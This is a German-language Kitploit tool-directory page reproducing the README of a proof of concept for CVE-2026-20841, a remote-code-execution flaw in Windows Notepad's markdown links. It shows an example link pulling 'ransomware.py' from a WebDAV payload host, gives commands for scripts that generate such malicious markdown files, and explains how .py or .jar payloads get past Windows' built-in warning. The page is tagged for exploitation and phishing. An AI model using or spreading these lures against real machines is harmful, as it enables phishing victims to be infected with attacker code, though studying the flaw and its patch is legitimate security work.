Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20841 — PoC for the "Windows Notepad RCE" | Kitploit
Tools/GitHubGitHub/tangent65536/cve-2026-20841
Payload GenerationExploitationPhishing
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

PoC for the "Windows Notepad RCE"

Repository anzeigen
21vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-20841 PoC

PoC der „Windows Notepad RCE“-Schwachstelle.

Haftungsausschlüsse

  1. Ich bin NICHT derjenige, der diese Schwachstelle entdeckt hat. Respekt an die ursprünglichen Autoren, die auf der offiziellen Offenlegungsseite aufgeführt sind. Ich habe den PoC lediglich gemäß der Beschreibung nachgebaut.
  2. Ich persönlich halte diese Schwachstelle nicht für so schwerwiegend, wie sie vielleicht aussieht. Es erfordert mehr als einen Klick, um sie auszulösen, es sei denn, bestimmte Kriterien auf dem Zielsystem sind erfüllt. Bitte lesen Sie den Abschnitt Kriterien und Einschränkungen. Ich habe diesen PoC nachgebaut, weil er sehr memewürdig ist. Ein „Notepad RCE“ klingt verdammt verrückt.

Beschreibung

Die „Schwachstelle“ ist einfach. Die Markdown-Engine in Windows Notepad kümmert sich nicht um obskure URL-Protokolle. Als Malware-Analyst habe ich viele Berichte über WebDAV- und SMB-basierte Payload-Bereitstellung gelesen. Aus diesem Dokument kann man das file:///-Protokoll missbrauchen und eine URL erstellen, die auf eine Datei auf einem WebDAV/SMB-Server verweist.

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

Nutzung

Ich habe zwei Skripte erstellt. Eines in Node.js und das andere in Python. Beide erstellen eine Markdown-Datei, die auf einen WebDAV-Payload verweist. Sie können die Beispiel-Payloads im Ordner sample-payloads verwenden.

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

Die Ausgabe (poc.md) erscheint im aktuellen Verzeichnis.

Kriterien und Einschränkungen

  1. Die meisten Payload-Dateierweiterungen (z. B. .exe, .lnk, .vbs, ...) lösen trotz der Verwundbarkeit der Notepad-App eine integrierte Warnung aus. Die Warnung kommt von Windows selbst. Zumindest bei allem, was ich getestet habe und das zu Codeausführung auf einer standardmäßigen OOB-Installation führen kann, wird diese obligatorische Warnung angezeigt.
    fig01

  2. Wenn auf dem Zielgerät Python oder Java installiert ist, können Sie einen .py- oder .jar-Payload verwenden, um das Warn-Pop-up zu umgehen.

Nach dem Patchen

fig02
Durch Klicken auf den Link wird nun eine neue Pop-up-Warnung angezeigt.

Sonstiges

Sie können die anfällige Version von Windows Notepad von Uptodown finden. Denken Sie daran, die digitale Signatur des Installers zu überprüfen und sicherzustellen, dass sie von Microsoft stammt. Außerdem sollten Sie diesen PoC nur in einer VM testen.

Bleiben Sie sicher und haben Sie Spaß!

Tool herunterladen